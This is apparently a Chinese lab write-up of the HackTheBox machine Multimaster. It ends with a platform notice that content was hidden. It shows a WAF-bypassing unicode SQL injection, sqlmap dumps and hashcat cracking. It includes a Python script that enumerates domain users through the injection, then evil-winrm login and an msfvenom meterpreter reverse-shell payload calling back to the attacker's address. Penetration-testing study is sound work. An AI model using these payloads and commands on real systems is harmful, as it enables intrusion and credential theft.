nmap -p- --min-rate 1000 -v -sV -sC -A -Pn 10.10.10.179
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 6944F7C42798BE78E1465F1C49B5BF04
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: MegaCorp
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-17 11:59:31Z)
135/tcp open tcpwrapped
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MEGACORP
| NetBIOS_Domain_Name: MEGACORP
| NetBIOS_Computer_Name: MULTIMASTER
| DNS_Domain_Name: MEGACORP.LOCAL
| DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
| DNS_Tree_Name: MEGACORP.LOCAL
| Product_Version: 10.0.14393
|_ System_Time: 2023-07-17T12:00:33+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Issuer: commonName=MULTIMASTER.MEGACORP.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-16T11:27:23
| Not valid after: 2024-01-15T11:27:23
| MD5: 5f19 2837 0bbd 1e6d 0817 a338 6a34 a157
|_SHA-1: 21ce 2357 7cb1 5efe 38f6 e8ae 1fbb 4604 6d03 abf9
|_ssl-date: 2023-07-17T12:01:12+00:00; +7m00s from scanner time.
5985/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open unknown
49668/tcp open unknown
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open unknown
49678/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h31m01s, deviation: 3h07m53s, median: 6m59s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: MULTIMASTER
| NetBIOS computer name: MULTIMASTER\x00
| Domain name: MEGACORP.LOCAL
| Forest name: MEGACORP.LOCAL
| FQDN: MULTIMASTER.MEGACORP.LOCAL
|_ System time: 2023-07-17T05:00:38-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-17T12:00:32
|_ start_date: 2023-07-17T11:27:28
MULTIMASTER.MEGACORP.LOCAL
有个collegue finder功能,输入空能返回所有人员信息
提取出所有的邮箱
sbauer@megacorp.htb
okent@megacorp.htb
ckane@megacorp.htb
kpage@megacorp.htb
shayna@megacorp.htb
james@megacorp.htb
cyork@megacorp.htb
rmartin@megacorp.htb
zac@magacorp.htb
jorden@megacorp.htb
alyx@megacorp.htb
ilee@megacorp.htb
nbourne@megacorp.htb
zpowers@megacorp.htb
aldom@megacorp.htb
minato@megacorp.htb
egre55@megacorp.htb
把用户名提出来用kerbrute验证了一下,都是域用户
./kerbrute_linux_amd64 userenum --dc MULTIMASTER.MEGACORP.LOCAL -d MEGACORP.LOCAL ~/Downloads/temp/multimaster/username.txt
尝试asreproast无果
回过头继续看这个web,唯一的查询接口看样子是有waf,我name直接写成select,发现返回和扫目录的一样是403.
首先要确认有哪些字符被拦截了,可以用wfuzz或者直接burp intruder
网上找了一个fuzz字典,发现基本全是403
wfuzz -c -u http://10.10.10.179/api/getColleagues -w ~/Downloads/temp/multimaster/fuzz.txt -d '{"name":"FUZZ"}' -H 'Content-Type: application/json;charset=utf-8' -t 1
翻了下wp,他字典用的/usr/share/seclists/Fuzzing/special-chars.txt
因为请求包里Content-Type里有个charset=utf-8,所以他尝试Unicode编码单引号为\u27成功报错。手动用cyberchef编码再repeater发包
admin' order by 5 -- asdf
admin' order by 6 -- asdf
确认列数为5
admin' union select 1,2,3,4,5 -- asdf
发现都有回显,随便选一个字段
admin' union select 1,2,@@version,4,5 -- asdf
上sqlmap,这个服务很容易跑挂。
sqlmap -r 1.txt --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --technique="U" --union-cols=5 --prefix="admin' " --suffix="-- asdf" --batch --proxy http://127.0.0.1:8080 --dbms=mssql --dbs
发现当前库就两张表直接dump
sqlmap -r 1.txt --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --technique="U" --union-cols=5 --prefix="admin' " --suffix="-- asdf" --batch --proxy http://127.0.0.1:8080 --dbms=mssql -D Hub_DB --dump
logins表中有hash,Colleagues表里就是姓名邮箱职位
通过在线网站hash_identifier识别hash类型
SHA3-384没结果,Keccak-384用hashcat爆破成功(john不支持这个类型)
hashcat -a 0 -m 17900 hash.txt /usr/share/wordlists/rockyou.txt
Password | Users |
---|---|
password1 | sbauer, shayna, james, cyork, jorden, aldom |
finance1 | ckane, kpage, zac, ilee, zpowers |
banking1 | okent, rmartin, alyx, nbourne |
? | minatotw, egre55 |
尝试利用这些密码:web,smb,winrm都登录不了,
hacktricks里mssql-injection提到可以通过mssql枚举域内用户
import sys
import requests
import string
import binascii
import struct
import time
proxy = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
head = {
"Origin": "http://10.10.10.179",
"Referer": "http://10.10.10.179/",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Content-Type": "application/json;charset=utf-8"
}
def charunicodeescape(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += r"\u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += r'\u%.4X' % ord(payload[i])
i += 1
return retVal
def query(key):
url = "http://10.10.10.179/api/getColleagues"
payload = "admin' union select 1,2,3,{},5 -- asdf".format(key)
payload = charunicodeescape(payload)
content = '{"name": "' + payload +'"}'
r = requests.post(url, data=content, proxies=proxy, timeout=10,headers=head)
if r.status_code == 200:
all = r.json()[0]
result = all.get("email")
return result
print("error!")
return None
domain_name = query("DEFAULT_DOMAIN()")
print("查询域名如下:{}".format(domain_name))
sid_hex = query("master.dbo.fn_varbintohexstr(SUSER_SID('{}\Administrator'))".format(domain_name))
domain_sid_hex = sid_hex[:-8]
print("查询域sid:{}".format(domain_sid_hex))
#爆破域用户
for i in range(500, 10500):
sys.stdout.write(f"\r[*] Checking SID {i}" + " " * 50)
user_sid_hex = binascii.hexlify(struct.pack("<I", i)).decode()
full_sid_hex = domain_sid_hex + user_sid_hex
try:
result = query("SUSER_SNAME({})".format(full_sid_hex))
except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout):
print("{}超时".format(i))
time.sleep(5)
result = query("SUSER_SNAME({})".format(full_sid_hex))
if result:
print("找到域用户:{} {}".format(str(i), result))
time.sleep(5)
这里有个小坑点,如果直接采用
content = {"name": payload}
r = requsets.post(url, json=content)
这种方式发送,\u0027这种unicode编码的斜杠前面还会被加个斜杠变成\\u0027
有个新用户tushikikatomo
crackmapexec winrm -u tushikikatomo -p password1 finance1 banking1 -d MEGACORP.LOCAL 10.10.10.179
evil-winrm -i 10.10.10.179 -u tushikikatomo -p finance1
net user /domain
查询到所有的域用户
Administrator aldom alice alyx andrew ckane cyork dai DefaultAccount Guest ilee james jorden jsmmons kpage krbtgt lana nbourne okent pmartin rmartin sbauer svc-nas svc-sql tushikikatomo zac zpowers
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUNC=thread -f raw -o raw.bin
再使用知道创宇shellcodeloaderdynamic load方式生成loader
虽然有报错但是还是上线了,想迁移下进程,ps
发现有很多code.exe
program files目录发现确实有安装vscode
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。